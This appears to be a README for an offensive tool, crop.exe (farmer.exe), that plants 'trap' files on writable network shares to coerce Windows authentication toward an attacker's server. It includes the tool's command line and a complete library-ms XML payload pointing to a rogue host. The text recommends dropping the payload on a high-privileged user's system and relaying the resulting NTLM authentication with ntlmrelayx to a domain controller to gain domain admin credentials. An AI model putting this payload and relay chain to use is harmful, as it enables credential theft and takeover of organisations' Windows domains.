v1.0

farmer.exe (crop.exe)

By
Brian Johnson

It farms stuff, like creds! Read more here.

Set "trap" files that coerce authentication from vicim systems.

crop.exe \\writablecomputer\writableshare _index.searchConnector-ms \\DNSNAME-OF-KALI@80\test

Head to the webclientservicesscanner page to learn more about how to abuse WebClient.

Create library-ms file to coerce authentication

Here's a sample file to drop on a high-privileged user's system. If they browse to the folder this file (call it something like index.library-ms), an HTTP auth will fire to \\dns-entry-for-your-rogue-server@80\test and you could use something like ntlmrelayx to relay to a DC for free DA creds!

  <?xml version="1.0" encoding="UTF-8"?>
  <libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@windows.storage.dll,-34582</name>
  <version>6</version>
  <isLibraryPinned>true</isLibraryPinned>
  <iconReference>imageres.dll,-1003</iconReference>
  <templateInfo>
  <folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
  </templateInfo>
  <searchConnectorDescriptionList>
  <searchConnectorDescription>
  <isDefaultSaveLocation>true</isDefaultSaveLocation>
  <isSupported>false</isSupported>
  <simpleLocation>
  <url>\\dns-entry-for-your-rogue-server@80\test</url>
  </simpleLocation>
  </searchConnectorDescription>
  </searchConnectorDescriptionList>
  </libraryDescription>